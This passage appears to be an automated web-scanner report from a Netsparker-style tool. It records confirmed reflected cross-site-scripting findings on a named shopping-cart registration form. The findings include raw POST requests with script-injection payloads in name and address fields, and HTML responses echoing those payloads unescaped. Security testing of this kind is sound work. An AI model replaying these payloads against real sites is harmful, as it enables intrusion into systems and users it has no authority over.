<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="'"--></style></script><script>netsparker(0x00022B)</script>"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST '"--></style></script><script>alert(0x00022C)</script>
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00022C)%3c%2fscript%3e&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:37 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="'"--></style></script><script>netsparker(0x00022C)</script>"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST '"--></style></script><script>alert(0x00022D)</script>
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 343
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00022D)%3c%2fscript%3e&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:40 GMT
Content-Length: 12073
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="'"--></style></script><script>netsparker(0x00022D)</script>"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST '"--></style></script><script>alert(0x00022E)</script>
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00022E)%3c%2fscript%3e&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:43 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
